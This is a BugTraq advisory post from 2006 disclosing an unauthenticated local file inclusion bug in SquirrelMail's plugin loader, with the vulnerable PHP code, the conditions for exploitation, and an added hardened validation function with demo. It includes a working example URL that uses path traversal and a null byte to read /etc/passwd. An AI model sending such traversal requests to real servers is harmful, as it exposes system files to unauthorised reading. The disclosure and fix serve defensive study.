BugTraq
Squirrelmail local file inclusion Jun 01 2006 12:50AM
brokejunker yahoo com (1 replies)
Squirrelmail local file inclusion bug in functions/plugin.php.

Tested on the latest 1.4.x version.

No authentication needed.

    if (isset($plugins) && is_array($plugins)) {
        foreach ($plugins as $name) {
            use_plugin($name);
        }

    ...

    function use_plugin ($name) {
        if (file_exists(SM_PATH . "plugins/$name/setup.php")) {
            include_once(SM_PATH . "plugins/$name/setup.php");
            $function = "squirrelmail_plugin_init_$name";
            if (function_exists($function)) {
                $function();
            }
        }
    }

    ....

If register_globals is on we can control the $name variable.

In order to avoid errors SM_PATH needs to be defined. Exploitation is done through src/redirect.php (it includes functions/plugin.php prior to authentication and it defines SM_PATH).

magic_quotes_gpc needs to be off.

Example:

http://[host]/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00

Denix Solutions

Unix/Linux Solutions for your Business

http://www.denixsolutions.com

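Added example, not part of the original post and not SquirrelMail's own patch: a hardened counterpart to the use_plugin() path handling quoted above, which validates the plugin name before any file is included. The function name safe_plugin_setup_path(), the $root parameter (standing in for SM_PATH . "plugins/") and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example (hypothetical helper, not SquirrelMail code).
// $root stands in for SM_PATH . 'plugins/'.

/**
 * Return the resolved setup.php path for a plugin name,
 * or null when the name is not safe to include.
 */
function safe_plugin_setup_path(string $root, $name): ?string
{
    // Request-derived values can be arrays or other types; accept strings only.
    if (!is_string($name)) {
        return null;
    }
    // Allowlist: letters, digits, underscore. This rejects "/", "..",
    // and NUL bytes, so the name can never leave the plugin directory.
    if (preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name) !== 1) {
        return null;
    }
    $rootReal  = realpath($root);
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $name
                          . DIRECTORY_SEPARATOR . 'setup.php');
    if ($rootReal === false || $candidate === false) {
        return null; // plugin root or setup.php does not exist
    }
    // Defence in depth: the resolved path must still sit under the plugin
    // root (catches symlinks that point elsewhere).
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo data: a temporary plugin tree with one legitimate plugin.
$root = sys_get_temp_dir() . '/sm_plugins_' . uniqid();
mkdir("$root/demo_plugin", 0700, true);
file_put_contents("$root/demo_plugin/setup.php", "<?php // constructed sample\n");

// The second input is the value from the advisory's example URL, decoded.
$inputs = ['demo_plugin', "../../../../etc/passwd\0", 'missing', ['x']];
foreach ($inputs as $in) {
    $path = safe_plugin_setup_path($root, $in);
    printf("%-36s => %s\n", json_encode($in), $path === null ? 'rejected' : 'accepted');
}
```

Only demo_plugin is accepted. The name check alone does not address the register_globals condition the post describes; the loader also needs $plugins to be set by its own configuration rather than taken from the request.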
Re: Squirrelmail local file inclusion Jun 02 2006 04:21AM
Paul Schmehl (pauls utdallas edu)


 

Copyright 2010, SecurityFocus